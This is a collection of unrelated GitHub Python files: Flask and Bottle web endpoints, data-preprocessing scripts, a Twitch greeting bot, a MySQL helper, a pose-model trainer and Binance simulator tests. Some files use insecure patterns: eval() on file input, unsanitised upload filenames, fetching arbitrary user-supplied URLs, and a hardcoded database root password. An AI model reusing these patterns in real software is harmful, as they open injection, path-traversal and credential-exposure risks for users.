'Changed'}\n\n#delete user's post\n@post_bp.route('//',methods=['DELETE'])\ndef delete_user_post(user_id : int, post_id : int):\n delete_post = delete_exact_post_db(post_id, user_id)\n\n if delete_post:\n return {'status':1,'message':'post deleted'}\n return {'status':0 , 'message':'Not Found'}\n\n\n#publish post\n@post_bp.route('/upload_post',methods=['POST'])\ndef create_post(post_text : str,user_id : int):\n # получение из фронт части фото\n file = request.files.get('post_photo','')\n file.save(f'user_images/{file.filename}')\n\n #получение хэштегов из фронта\n hashtags = request.json.get('hashtags')\n\n\n # сохранение фото id в базу\n new_photo_id = post_new_photo_db(user_id, file.filename)\n\n # сохрвнение поста\n new_post = add_new_post_db(user_id = user_id , photo_id=new_photo_id,post_text=post_text)\n if hashtags:\n create_post_for_hashtag(new_post,hashtags)\n\n return {'status':1,'message':'Post created'}\n","repo_name":"AmirShaymardanov23/Social","sub_path":"posts/posts_api.py","file_name":"posts_api.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42765786084","text":"# coding: utf-8\nfrom json import dumps\nimport datetime, os\n\nimport requests\nfrom bottle import Bottle, request, response\nfrom PIL import Image, ImageFile\n\nfrom inception_v3 import run_inference_on_image\n\n# TRUNCATED画像も読み込む\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n# 複数のPOSTを受けるのでtmpファイルに日付を入れる\nTMP_IMAGE = '/tmp/inception_tmp_{}.jpg'\n\ninception_app = Bottle()\n\n\n# GETで画像urlを渡して分類を判定する。ContentType:multipart/form-data\n@inception_app.get('/inception')\ndef get_inception():\n # request image url\n response = requests.get(request.params.image, stream=True)\n\n path = image_path()\n\n # save image\n with open(path, 'wb') as file:\n for chunk in response.iter_content(chunk_size=1024):\n file.write(chunk)\n\n # scan\n result = inception_scan(path)\n\n response.content_type = 'application/json'\n return dumps(result)\n\n\n# POSTで画像binaryを渡して分類を判定する。ContentType:multipart/form-data\n@inception_app.post('/inception')\ndef post_inception():\n # request image binary\n image = request.files.get('image')\n\n path = image_path()\n\n # save image\n image.save(path, overwrite=True, chunk_size=1024)\n\n # scan\n result = inception_scan(path)\n\n response.content_type = 'application/json'\n return dumps(result)\n\n\n# apiテスト用View\n@inception_app.get('/inception/test')\ndef get_inception_test():\n return '''\n

      \n \n \n
      \n'''\n\n\ndef image_path():\n now = datetime.datetime.utcnow().strftime(\"%Y-%m-%d_%H:%M:%S.%f\")\n return TMP_IMAGE.format(now)\n\ndef convert(path, format='jpeg'):\n image = Image.open(path)\n image.save(path, format)\n\ndef inception_scan(path):\n # convert jpeg\n convert(path, 'jpeg')\n # classify image\n result = run_inference_on_image(path)\n # delete tmp image\n os.remove(path)\n\n return result\n","repo_name":"arakawamoriyuki/ml_study","sub_path":"anaconda_bottle/app/inception.py","file_name":"inception.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21056401926","text":"import pickle\nimport pandas as pd\nimport re\ndef to_df(file_path):\n with open(file_path, 'r') as fin:\n df = {}\n i = 0\n for line in fin:\n line = re.sub(\"\\\"verified\\\"\\: true,\",'',line)\n line = re.sub(\"\\\"verified\\\"\\: false,\",'',line)\n df[i] = eval(line)\n i += 1\n df = pd.DataFrame.from_dict(df, orient='index')\n return df\n\n\nreviews_df = to_df('ft_local/CDs_and_Vinyl_5.json')\n\nwith open('dataset/reviews_CDs.pkl', 'wb') as f:\n pickle.dump(reviews_df, f, pickle.HIGHEST_PROTOCOL)\n\nmeta_df = to_df('ft_local/meta_CDs_and_Vinyl.json')\nmeta_df = meta_df[meta_df['asin'].isin(reviews_df['asin'].unique())]\nmeta_df = meta_df.reset_index(drop=True) \nwith open('dataset/meta_CDs.pkl', 'wb') as f:\n pickle.dump(meta_df, f, pickle.HIGHEST_PROTOCOL)\n\n\n","repo_name":"Scarlett2333/autofuse","sub_path":"data_preprocess/1_format_process.py","file_name":"1_format_process.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15926822098","text":"import collections\nimport csv\nimport re\n\nSequence = collections.namedtuple(\"sequence\", [\"taxon\", \"sequence\"])\n\n\ndef read_fasta_sequences(filename: str) -> list[Sequence]:\n sequences = {}\n with open(filename, \"r\") as fp:\n for line in fp:\n line = line.strip()\n if line.startswith(\">\"):\n taxon = line[1:]\n sequences[taxon] = \"\"\n else:\n sequences[taxon] += line\n return [Sequence(taxon, sequence) for taxon, sequence in sequences.items()]\n\n\ndef convert_date_to_real(day, month, year):\n if year % 4 == 0:\n days = (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)\n else:\n days = (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)\n\n for i in range(month - 1):\n day += days[i]\n\n return (day - 1) / sum(days) + year\n\n\ndef read_dates_from_csv(input_file, date_format=None):\n dates = {}\n with open(input_file) as fp:\n reader = csv.reader(\n fp,\n quotechar='\"',\n delimiter=\",\",\n quoting=csv.QUOTE_ALL,\n skipinitialspace=True,\n )\n for line in reader:\n index_name = line.index(\"strain\")\n index_date = line.index(\"date\")\n break\n for line in reader:\n dates[line[index_name]] = line[index_date]\n\n if date_format is not None:\n res = re.split(r\"[/-]\", date_format)\n yy = res.index(\"yyyy\")\n MM = res.index(\"MM\")\n dd = res.index(\"dd\")\n\n for key, date in dates.items():\n res1 = re.split(r\"[/-]\", date)\n dates[key] = convert_date_to_real(\n int(res1[dd]), int(res1[MM]), int(res1[yy])\n )\n return dates\n","repo_name":"4ment/physher","sub_path":"python/physhpy/cli/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"30502864172","text":"import socket, ssl, json\n#twitch greeting bot\n\n#building a socket which can connect to the irc chat server from twitch with the modules: socket and ssl\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nirc = ssl.wrap_socket(socket)\nip, port = \"irc.chat.twitch.tv\", 6697\nirc.connect((ip, port))\n\n#define a chat_user list to check if users are not in the list and greet them.\nchat_user = []\n\n#load the json config file to get the username, oauth token and channel\nfile = r\"C:\\Users\\PC\\Desktop\\fiverr\\config.json\"\nwith open(file, \"r\") as f:\n data = json.load(f)\n\n#define vars. from the data of the config\nname = data[\"username\"]\nchannel = data[\"channel\"]\ntoken = data[\"token\"]\n\n\nclass bot:\n #send method to send messages to the irc server not the chat\n def send(self, irc, message):\n irc.send(bytes(f\"{message}\\r\\n\", \"utf8\"))\n\n #this method is just for sending messages in the twitch chat\n def send_chat(self, irc, message):\n self.send(irc, f\"PRIVMSG #{channel} :{message}\")\n\n #method to handle the chat messages and to something\n def commands(self, irc, message):\n args = [str(message[i]) for i in range(len(message)) if i > 2] #list comp to get the args of the chat message\n args[0] = args[0].replace(\":\", \"\")\n\n user = message[0].split(\"!\")[0].replace(\":\", \"\")\n if user not in chat_user:\n chat_user.append(user)\n self.send_chat(irc, f\"Welcome to the stream @{user}\")\n\n #method to start the twitch bot\n def start(self):\n self.send(irc, f\"PASS {token}\")\n self.send(irc, f\"NICK {name}\")\n self.send(irc, f\"JOIN #{channel}\")\n\n while True:\n data = irc.recv(1024).decode(\"utf8\")\n message = data.split()\n if message[1] == \"PRIVMSG\":\n self.commands(irc, message)\n for line in data.splitlines():\n if line == \"PING :tmi.twitch.tv\":\n self.send(irc, \"PONG\")\n print(line)\n\n#define a instance of the bot class to start the bot\nBot = bot()\nif __name__ == \"__main__\":\n Bot.start()\n","repo_name":"Karpfen11/twitch-greeting-bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3345366607","text":"class Solution:\r\n def topKFrequent(self, words, k: int):\r\n dic = {}\r\n for i in range(0, len(words)):\r\n dic[words[i]] = dic.get(words[i], 0) + 1\r\n res = []\r\n for i in dic.keys():\r\n res.append([i, dic[i]])\r\n res.sort(key=lambda x: (-x[1], x[0])) # 次数升序,首字母降序\r\n result = []\r\n for i in range(k):\r\n result.append(res[i][0])\r\n return result\r\n\r\n\r\nprint(Solution().topKFrequent([\"i\", \"love\", \"leetcode\", \"i\", \"love\", \"coding\"], 2))\r\nprint(Solution().topKFrequent([\"the\", \"day\", \"is\", \"sunny\", \"the\", \"the\", \"the\", \"sunny\", \"is\", \"is\"], 4))\r\n","repo_name":"Hegemony/Python-Practice","sub_path":"LeetCode practice/Other/692.topKFrequent.py","file_name":"692.topKFrequent.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1128951873","text":"size, walls = [int(i) for i in input().split()]\nparts = [int(i) for i in input().split()]\nparts.append(size)\nparts.insert(0, 0)\nconfigs = set()\n\nfor i in range(walls + 1):\n for j in range(i + 1, walls + 2):\n configs.add(parts[j] - parts[i])\n\nprint(\" \".join([str(i) for i in sorted(configs)])) \n\n","repo_name":"Hexfall/Kattis","sub_path":"flexible.py","file_name":"flexible.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39658109788","text":"# module defines operations to use with sql database - adapted from Sierra Clibourne's SQLLite db_operations\nimport mysql.connector\nimport time\nimport datetime\n\nclass sql_operations():\n def __init__(self):\n try:\n global mydb\n # REPLACE THE PASSWORD WITH YOUR ROOT SQL PASSWORD\n mydb = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"monSQL92610@\",\n auth_plugin='mysql_native_password', database='teacher_timesheet')\n\n # create cursor obj to interact with mySQL\n self.cursor = mydb.cursor()\n\n # create teacher timesheet schema\n # self.cursor.execute(\"CREATE SCHEMA teacher_timesheet\")\n # self.cursor.execute(\"SHOW DATABASES\")\n # for x in self.cursor:\n # print(x)\n\n # print(\"SQL CONNECTION SUCCESSFUL.\\n\")\n except:\n print(\"SQL CONNECTION FAILED.\\n\")\n\n # function for bulk inserting records\n def bulk_insert(self, query, records):\n self.cursor.executemany(query, records)\n mydb.commit()\n #print(\"query executed..\")\n \n # function for inserting one record\n def insert(self, query):\n self.cursor.execute(query)\n mydb.commit()\n #print(\"query executed..\")\n \n # function to return a single value from table\n def single_record(self, query):\n self.cursor.execute(query)\n return self.cursor.fetchone()[0]\n\n # function to return a single record from table\n def single_row(self, query):\n self.cursor.execute(query)\n return self.cursor.fetchone()\n\n # function to return a single attribute values from table\n def single_attribute(self, query):\n self.cursor.execute(query)\n results = self.cursor.fetchall()\n results = [i[0] for i in results]\n try:\n results.remove(None)\n except:\n pass\n return results\n\n # SELECT with named placeholders\n def name_placeholder_query(self, query, dictionary):\n self.cursor.execute(query, dictionary)\n results = self.cursor.fetchall()\n results = [i[0] for i in results]\n return results\n \n def bulk_query(self, query):\n self.cursor.execute(query)\n results = self.cursor.fetchall()\n return results\n \n # Used to add testing data to database\n def add(self):\n # sql1 = \"INSERT INTO rides (userID, driverID, pickupLoc, dropLoc, RideRating) VALUES (%s, %s, %s, %s, %s)\"\n\n # vals = [\n # (\"222\", \"333\", \"Coruscant\", \"Alderaan\", \"5\"),\n # (\"444\", \"666\", \"Raada\", \"Hoth\", \"3\"),\n # (\"555\", \"333\", \"Tatooine\", \"Death Star\", \"4\")\n # ]\n\n # sql1 = \"INSERT INTO teachers (teachID, locID, FirstName, LastName) VALUES (%s, %s, %s, %s)\"\n\n # vals = [\n # (\"1\", \"2\", \"Nathan\", \"Nguyen\"),\n # (\"2\", \"2\", \"John\", \"Dang\"),\n # (\"3\", \"1\", \"Gage\", \"Banzon\"),\n # (\"4\", \"3\", \"Olivia\", \"Chilvers\")\n # ]\n\n # sql2 = \"INSERT INTO schools (locID, Name) VALUES (%s, %s)\"\n\n # vals2 = [\n # (\"1\", \"Beacon Park\"),\n # (\"2\", \"Brywood\"),\n # (\"3\", \"Stonecreek\"),\n # ]\n\n sql3 = \"INSERT INTO timesheets (teachID, entryID, timesheetID) VALUES (%s, %s, %s)\"\n\n vals3 = [\n (\"1\", \"1\", \"1\"),\n (\"2\", \"2\", \"2\"),\n (\"3\", \"3\", \"3\"),\n (\"4\", \"4\", \"4\")\n ]\n\n # sql4 = \"INSERT INTO entry (entryID, timeIn, timeOut, timesheetID) VALUES (%s, %s, %s, %s)\"\n\n # date1 = datetime.datetime(2022, 7, 13, 7, 12, 0)\n # date1.strftime('%Y-%M-%D %H:%M:%S')\n # date2 = datetime.datetime(2022, 7, 13, 7, 20, 0)\n # date2.strftime('%Y-%M-%D %H:%M:%S')\n # date3 = datetime.datetime(2022, 7, 14, 7, 0, 0)\n # date3.strftime('%Y-%M-%D %H:%M:%S')\n # date4 = datetime.datetime(2022, 7, 17, 7, 30, 0)\n # date4.strftime('%Y-%M-%D %H:%M:%S')\n\n # date5 = datetime.datetime(2022, 7, 13, 15, 15, 0)\n # date5.strftime('%Y-%M-%D %H:%M:%S')\n # date6 = datetime.datetime(2022, 7, 13, 15, 13, 0)\n # date6.strftime('%Y-%M-%D %H:%M:%S')\n # date7 = datetime.datetime(2022, 7, 14, 15, 4, 0)\n # date7.strftime('%Y-%M-%D %H:%M:%S')\n # date8 = datetime.datetime(2022, 7, 17, 15, 30, 0)\n # date8.strftime('%Y-%M-%D %H:%M:%S')\n\n # vals4 = [\n # (\"1\", date1, date5, \"1\"),\n # (\"2\", date2, date6, \"2\"),\n # (\"3\", date3, date7, \"3\"),\n # (\"4\", date4, date8, \"4\")\n # ]\n\n # sql5 = \"INSERT INTO students (studID, grade, teachID, FirstName, LastName) VALUES (%s, %s, %s, %s, %s)\"\n\n # vals5 = [\n # (\"1\", \"5\", \"1\", \"Adrian\", \"Atlas\"),\n # (\"2\", \"5\", \"1\", \"Britney\", \"Book\"),\n # (\"3\", \"5\", \"1\", \"Chloe\", \"Claus\"),\n # (\"4\", \"5\", \"1\", \"Darian\", \"Deck\"),\n # (\"5\", \"5\", \"1\", \"Edward\", \"Edison\"),\n # (\"6\", \"6\", \"2\", \"Felicity\", \"Farm\"),\n # (\"7\", \"6\", \"2\", \"George\", \"Gold\"),\n # (\"8\", \"6\", \"2\", \"Heather\", \"Hill\"),\n # (\"9\", \"6\", \"2\", \"Isabelle\", \"Isotope\"),\n # (\"10\", \"6\", \"2\", \"Jason\", \"Jack\"),\n # (\"11\", \"3\", \"3\", \"Keath\", \"King\"),\n # (\"12\", \"3\", \"3\", \"Lily\", \"Lover\"),\n # (\"13\", \"3\", \"3\", \"Monique\", \"Monty\"),\n # (\"14\", \"3\", \"3\", \"Nicholas\", \"Nelson\"),\n # (\"15\", \"4\", \"4\", \"Opal\", \"Owen\"),\n # (\"16\", \"4\", \"4\", \"Patrick\", \"Pill\"),\n # (\"17\", \"4\", \"4\", \"Quirin\", \"Quill\"),\n # (\"18\", \"4\", \"4\", \"Rachel\", \"Rome\"),\n # (\"19\", \"4\", \"4\", \"Seth\", \"Soap\"),\n # (\"20\", \"4\", \"4\", \"Trevor\", \"Trick\")\n # ]\n\n # self.cursor.executemany(sql1, vals)\n # mydb.commit()\n # print(\"query executed...\")\n # self.cursor.executemany(sql2, vals2)\n # mydb.commit()\n # print(\"query executed...\")\n self.cursor.executemany(sql3, vals3)\n mydb.commit()\n print(\"query executed...\")\n # self.cursor.executemany(sql4, vals4)\n # mydb.commit()\n # print(\"query executed...\")\n # self.cursor.executemany(sql5, vals5)\n # mydb.commit()\n # print(\"query executed...\")\n\n \n\n # Creates timesheets table \n def create_timesheets_table(self):\n query = '''\n CREATE TABLE timesheets(\n teachID VARCHAR(20) NOT NULL,\n entryID INT NOT NULL,\n timesheetID INT NOT NULL PRIMARY KEY\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n \n # Creates entry table\n def create_entry_table(self):\n query = '''\n CREATE TABLE entry(\n entryID INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n timeOut DATETIME NOT NULL,\n timeIn DATETIME NOT NULL,\n timesheetID INT NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n\n # Create teachers table\n def create_teachers_table(self):\n query = '''\n CREATE TABLE teachers(\n teachID VARCHAR(20) NOT NULL PRIMARY KEY,\n locID INT NOT NULL,\n FirstName VARCHAR(20) NOT NULL,\n LastName VARCHAR(20) NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n\n # Create teachers table\n def create_schools_table(self):\n query = '''\n CREATE TABLE schools(\n locID INT NOT NULL PRIMARY KEY,\n Name VARCHAR(20) NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n \n # Create teachers table\n def create_students_table(self):\n query = '''\n CREATE TABLE students(\n studID VARCHAR(20) NOT NULL PRIMARY KEY,\n grade INT NOT NULL,\n teachID INT NOT NULL,\n FirstName VARCHAR(20),\n LastName VARCHAR(20) NOT NULL\n );\n '''\n self.cursor.execute(query)\n print('Table Created')\n\n # close connection\n def destructor(self):\n try:\n mydb.close()\n except:\n print(\"CLOSE CONNECTION FAILED.\")\n\n","repo_name":"nnguyen641/timesheet-database","sub_path":"sql_operations.py","file_name":"sql_operations.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20206041910","text":"# vms/app/visits.py\nimport click\nfrom models import Visit,Visitor,Office, session\nfrom datetime import datetime # Import datetime for current date and time\n\n@click.group()\ndef visits():\n \"\"\"Manage visits.\"\"\"\n pass\n\n@visits.command()\n@click.option('--person-visited', prompt='Enter person visited', help='Person visited')\n@click.option('--visitor-id', type=int, prompt='Enter visitor ID', help='Visitor ID')\n@click.option('--office-id', type=int, prompt='Enter office ID', help='Office ID')\ndef add(person_visited, visitor_id, office_id):\n \"\"\"Add a visit.\"\"\"\n # Check if the provided visitor_id and office_id exist in their respective tables\n visitor = session.query(Visitor).filter_by(visitor_id=visitor_id).first()\n office = session.query(Office).filter_by(office_id=office_id).first()\n\n if not visitor:\n click.echo(f\"Visitor with ID {visitor_id} not found.\")\n return\n if not office:\n click.echo(f\"Office with ID {office_id} not found.\")\n return\n\n # Get the current date and time\n current_datetime = datetime.now()\n\n # Create the visit record with the provided visitor_id and office_id\n visit = Visit(visitor_id=visitor_id, office_id=office_id, person_visited=person_visited, visit_date=current_datetime)\n session.add(visit)\n session.commit()\n click.echo(\"Visit added.\")\n\n\n@visits.command()\ndef list():\n \"\"\"List all visits.\"\"\"\n visits = session.query(Visit).all()\n click.echo(\"Visits:\")\n for visit in visits:\n click.echo(f\"ID: {visit.visit_id}, Visitor ID: {visit.visitor_id}, Office ID: {visit.office_id}, Person Visited: {visit.person_visited}, Visit Date: {visit.visit_date}\")\n\n\n@visits.command()\n@click.argument('visit_id', type=int)\n@click.option('--person-visited', prompt='Enter updated person visiting', help='Updated person visited')\ndef update(visit_id, person_visited):\n \"\"\"Update a visit by ID.\"\"\"\n visit = session.query(Visit).filter_by(visit_id=visit_id).first()\n if visit:\n visit.person_visited = person_visited\n session.commit()\n click.echo(f\"Visit with ID {visit_id} updated.\")\n else:\n click.echo(f\"Visit with ID {visit_id} not found.\")\n\n\n@visits.command()\n@click.argument('visit_id', type=int)\ndef delete(visit_id):\n \"\"\"Delete a visit by ID.\"\"\"\n visit = session.query(Visit).filter_by(visit_id=visit_id).first()\n if visit:\n session.delete(visit)\n session.commit()\n click.echo(f\"Visit with ID {visit_id} deleted.\")\n else:\n click.echo(f\"Visit with ID {visit_id} not found.\")\n\n\n@visits.command()\n@click.argument('visit_id', type=int)\ndef search(visit_id):\n \"\"\"Search for a visit by ID using binary search.\"\"\"\n visits = session.query(Visit).all()\n \n # Binary search to find the visit by ID\n left, right = 0, len(visits) - 1\n while left <= right:\n mid = (left + right) // 2\n if visits[mid].visit_id == visit_id:\n click.echo(f\"Visit found - ID: {visits[mid].visit_id}, Visitor ID: {visits[mid].visitor_id}, Office ID: {visits[mid].office_id},Person visited: {visits[mid].person_visited}\")\n return\n elif visits[mid].visit_id < visit_id:\n left = mid + 1\n else:\n right = mid - 1\n \n click.echo(f\"Visit with ID {visit_id} not found.\")\n","repo_name":"muthuieric/VMS-CLI","sub_path":"vms/visits.py","file_name":"visits.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2970135912","text":"\"\"\"\npretrained model\n\"\"\"\n\nfrom tensorflow import keras\nimport cv2\nimport poselib\nimport numpy as np\nfrom tqdm import tqdm\nfrom tensorflow import keras\n\ncache_dir = \"cache/\"\n\ndef get_video_as_frames(video_path):\n capture = cv2.VideoCapture(video_path)\n while True:\n retval, frame = capture.read()\n if not retval:\n return\n yield frame\n\ndef get_model():\n L = keras.layers\n seq = keras.models.Sequential()\n seq.add(L.ConvLSTM2D(filters=5, kernel_size=(3, 3),\n input_shape=(None, 17, 3, 1),\n padding='same', return_sequences=True, activation='relu'))\n\n seq.add(L.Conv3D(filters=1, kernel_size=(3, 3, 3),\n activation='relu',\n padding='same', data_format='channels_last'))\n\n seq.compile(loss='mae', optimizer='adam', metrics=['mae', 'mse'])\n\n return seq\n\ndef create_sequence(poses, context_length):\n pose_batches = []\n for i in range(len(poses) - context_length):\n slice = poses[i:i + context_length]\n pose_batches.append(slice)\n\n pose_batches = np.asarray(pose_batches)\n return pose_batches\n\n\ndef lr_schedule():\n def lrs(epoch):\n lr = 0.0002\n if epoch >= 1: lr = 0.0001\n if epoch >= 5: lr = 0.00005\n if epoch >= 10: lr = 0.00001\n return lr\n return keras.callbacks.LearningRateScheduler(lrs, verbose=True)\n\ndef checkpoint(path):\n cp = keras.callbacks.ModelCheckpoint(filepath=path,\n monitor='val_loss',\n save_best_only=True,\n verbose=1)\n return cp\n\ndef train(videos, output):\n accurate_detector_name = 'openpose'\n fast_detector_name = 'tpu'\n\n accurate_detector = poselib.PoseDetector(accurate_detector_name)\n fast_detector = poselib.PoseDetector(fast_detector_name)\n\n cache = get_cache()\n\n all_acc_poses = []\n all_fas_poses = []\n\n for video in videos:\n acc_name = video.split(\"/\")[-1].split(\".\")[0] + accurate_detector_name\n fas_name = video.split(\"/\")[-1].split(\".\")[0] + fast_detector_name\n if acc_name in cache and fas_name in cache:\n acc_poses = cache[acc_name]\n fas_poses = cache[fas_name]\n else:\n acc_poses = []\n fas_poses = []\n for frame in tqdm(get_video_as_frames(video)):\n pacc = get_pose(accurate_detector, frame)\n pfast = get_pose(fast_detector, frame)\n if pacc is None or pfast is None:\n continue\n acc_poses.append(pacc)\n fas_poses.append(pfast)\n\n acc_poses = np.asarray(acc_poses)\n fas_poses = np.asarray(fas_poses)\n\n set_cache(acc_name, acc_poses)\n set_cache(fas_name, fas_poses)\n\n all_acc_poses.append(acc_poses)\n all_fas_poses.append(fas_poses)\n\n model = get_model()\n print (model.summary())\n accurate_poses = []\n fast_poses = []\n\n context_length = 5\n for acc, fas in zip(all_acc_poses, all_fas_poses):\n pa = create_sequence(acc, context_length)\n pf = create_sequence(fas, context_length)\n\n accurate_poses.extend(pa)\n fast_poses.extend(pf)\n\n fast_poses = np.expand_dims(np.asarray(fast_poses), axis=-1)\n accurate_poses = np.expand_dims(np.asarray(accurate_poses), axis=-1)\n\n cp = checkpoint(\"../weights/kalman_model.hdf5\")\n model = keras.models.load_model(\"../weights/kalman_model.hdf5\")\n callbacks = [lr_schedule(), cp]\n model.fit(fast_poses,\n accurate_poses,\n epochs=100,\n validation_split=0.2, callbacks=callbacks)\n\ndef get_cache():\n cache = {}\n for fname in glob.glob(cache_dir + \"*.npy\"):\n var_name = fname.split(\"/\")[-1].split(\".\")[0]\n cache[var_name] = np.load(fname)\n return cache\n\ndef set_cache(var_name, arr):\n fname = cache_dir + var_name + \".npy\"\n np.save(fname, arr)\n\nclass PoseCorrector:\n def __init__(self, model_path):\n self.model = keras.models.load_model(model_path)\n\n def update(self, pose):\n pose = np.expand_dims(pose, axis=-1)\n predicted = self.model.predict(pose)\n return predicted\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--videos\", default=None, required=True)\n parser.add_argument(\"--output\", default=None, required=True)\n args = parser.parse_args()\n import glob\n video_paths = glob.glob(args.videos + \"*.*\")\n print (video_paths)\n train(video_paths, args.output)","repo_name":"4g/dhs2019","sub_path":"src/kalman_pose.py","file_name":"kalman_pose.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16646114650","text":"# 23/03/28\n# https://leetcode.cn/problems/reverse-string/submissions/\n\nfrom collections import List \n\n# 双指针\n# ✅\n\ndef reverseString(s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n \"\"\"\n\n leftPointer, rightPointer = 0, len(s) - 1\n\n while leftPointer < rightPointer:\n s[leftPointer], s[rightPointer] = s[rightPointer], s[leftPointer]\n leftPointer += 1\n rightPointer -= 1","repo_name":"Syueying/LeetCodeDaily","sub_path":"字符串/1. 反转字符串 - 344/Reverse String.py","file_name":"Reverse String.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9831481249","text":"from flask import Flask\n\nfrom controllers.indexController import index\nfrom controllers.testsController import tests_page, console_input\nfrom controllers.loginController import login, logout\n\n\ndef app_register_routes(app: Flask):\n routes = {\n '/': ('index', index, ['GET']),\n '/login': ('login', login, ['POST', 'GET']),\n '/logout': ('logout', logout, ['POST', 'GET']),\n '/tests': ('tests', tests_page, ['POST', 'GET']),\n\n\n '/tests/command': ('tests_command', console_input, ['POST'])\n\n }\n\n for route, (endpoint, view_func, methods) in routes.items():\n app.add_url_rule(route, endpoint, view_func, methods=methods)\n\n","repo_name":"FerrenF/fletsync","sub_path":"bootstrap/appRegisterRoutes.py","file_name":"appRegisterRoutes.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3152372563","text":"import logging\nimport unittest\nfrom unittest import mock\nimport json\n\nfrom binance_api import api, balance_handler, rdb\n\n\nclass TestBinanceAPI(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n logging.disable(logging.CRITICAL)\n balance_handler.deposit('api_key', 'omg', 10, 'available')\n cls.app = api.test_client()\n cls.headers = {\n \"X-MBX-APIKEY\": \"api_key\"\n }\n\n @classmethod\n def tearDownClass(cls):\n rdb.delete('balance_api_key_available')\n rdb.delete('balance_api_key_lock')\n\n def test_missing_key_for_authenticated_end_point(self):\n \"\"\"\n expect error message appears in response\n \"\"\"\n resp = self.app.get('/api/v3/account', headers={}, data={})\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.data.decode(), str({\n 'code': -2015,\n 'msg': 'Invalid read-key, API-key, and/or IP.'\n }))\n\n def test_get_depth_without_symbol(self):\n resp = self.app.get(\n '/api/v1/depth', headers=self.headers, data={})\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.data.decode(), str({\n 'code': -1102,\n 'msg': \"Mandatory parameter 'symbol' was not sent, \"\n \"was empty/null, or malformed.\"\n }))\n\n def test_get_depth_with_invalid_symbol(self):\n resp = self.app.get('/api/v1/depth?symbol=invalid_token',\n headers=self.headers, data={})\n self.assertEqual(resp.status_code, 200)\n self.assertRegex(resp.data.decode(), 'Invalid pair')\n\n def test_get_depth_with_valid_symbol(self):\n resp = self.app.get('/api/v1/depth?symbol=OMGETH',\n headers=self.headers, data={})\n self.assertEqual(resp.status_code, 200)\n ob = json.loads(resp.data)\n self.assertListEqual(list(ob.keys()), ['asks', 'bids', 'lastUpdateId'])\n\n def test_get_balance(self):\n resp = self.app.get('/api/v3/account',\n headers=self.headers, data={})\n balance = json.loads(resp.data)\n self.assertIn('balances', balance)\n\n def test_open_order(self):\n data = {\n 'symbol': 'OMGETH',\n 'quantity': '10',\n 'price': '0.00001',\n 'side': 'SELL'\n }\n resp = self.app.post('/api/v3/order',\n headers=self.headers, query_string=data)\n result = json.loads(resp.data)\n self.assertIn('orderId', result)\n\n def test_get_open_orders(self):\n query = {'symbol': 'OMGETH'}\n resp = self.app.get('/api/v3/openOrders',\n headers=self.headers, query_string=query)\n result = json.loads(resp.data)\n self.assertIsInstance(result, list)\n\n def test_cancel_order(self):\n # this one will stay in open orders\n data = {\n 'symbol': 'OMGETH',\n 'quantity': '10',\n 'price': '1', # bad price\n 'side': 'SELL'\n }\n resp = self.app.post('/api/v3/order',\n headers=self.headers, query_string=data)\n result = json.loads(resp.data)\n\n query = {'symbol': 'OMGETH', 'orderId': result['orderId']}\n resp = self.app.delete('/api/v3/order',\n headers=self.headers, query_string=query)\n result = json.loads(resp.data)\n self.assertIn('orderId', result)\n\n def _mock_withdraw(*args, **kargs):\n return \"tx_id\"\n\n @mock.patch('simulator.exchange.Exchange.withdraw', _mock_withdraw)\n def test_withdraw(self):\n query = {\n 'address': '0xc7159686de47f2ca06fcd1e74d1b9a1a0e584259',\n 'asset': 'omg',\n 'amount': '1'\n }\n resp = self.app.post('/wapi/v3/withdraw.html',\n headers=self.headers, query_string=query)\n result = json.loads(resp.data)\n self.assertEqual(result['msg'], 'success')\n\n def test_withdraw_history(self):\n resp = self.app.get('/wapi/v3/withdrawHistory.html',\n headers=self.headers)\n result = json.loads(resp.data)\n self.assertIn('withdrawList', result)\n\n def test_deposit_history(self):\n resp = self.app.get('/wapi/v3/depositHistory.html',\n 